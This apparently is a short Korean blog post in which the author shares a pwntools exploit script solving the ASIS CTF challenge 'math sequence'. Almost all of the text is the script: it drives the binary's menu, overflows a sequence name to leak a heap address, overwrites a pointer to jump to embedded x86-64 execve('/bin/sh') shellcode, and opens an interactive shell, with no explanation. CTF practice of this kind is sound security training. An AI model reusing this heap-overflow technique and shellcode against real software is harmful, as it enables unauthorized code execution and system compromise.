요즘 알고리즘을 공부하느라 해킹 공부를 소홀히 했다 ㅠㅠ 그래서 간만에 풀어본 asis math sequence!! 재밌다 ㅎㅎ
from pwn import *
s = process("./mathseq")
elf = ELF("./mathseq")
shell = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
libc = ELF("./libc")
def create(name,size,content):
s.recvuntil("? ")
s.sendline("1")
s.recvuntil("Please enter the sequence name: ")
s.send(name)
s.recvuntil("Please enter the sequence size: ")
s.sendline(str(size))
s.recvuntil("Please enter the sequence : ")
s.send(content)
def edit(index,yes_or_no,name,content):
s.recvuntil("? ")
s.sendline("2")
s.recvuntil("? ")
s.sendline(str(index))
s.recvuntil("Is it valid(y/n)? ")
s.sendline(yes_or_no)
if yes_or_no == "n":
s.recvuntil("Please enter the new sequence name: ")
s.send(name)
s.recvuntil("Please enter the new sequence : ")
s.send(content)
def dell(index):
s.recvuntil("? ")
s.sendline("3")
s.recvuntil("? ")
s.sendline(str(index))
def prints():
s.recvuntil("? ")
s.sendline("4")
def quit():
s.recvuntil("? ")
s.sendline("5")
create("A"*8,32,"1"*8)
create("B"*8,32,"2"*8)
create("C"*8,32,shell)
pay = "K"*102
pay += "h"*(3*8)
edit(2,"n",pay,"2"*8)
prints()
s.recvuntil("h"*24)
heap = u64(s.recv(4)+"\x00"*4)
heap = heap - 0x1190
print "heap : " + hex(heap)
shell_addr = heap + 0x1260
print "shell : " + hex(shell_addr)
edit(1,"n","A"*0x7e+"\xe0","2"*8+p64(0xa1)+p64(shell_addr))
prints()
s.interactive()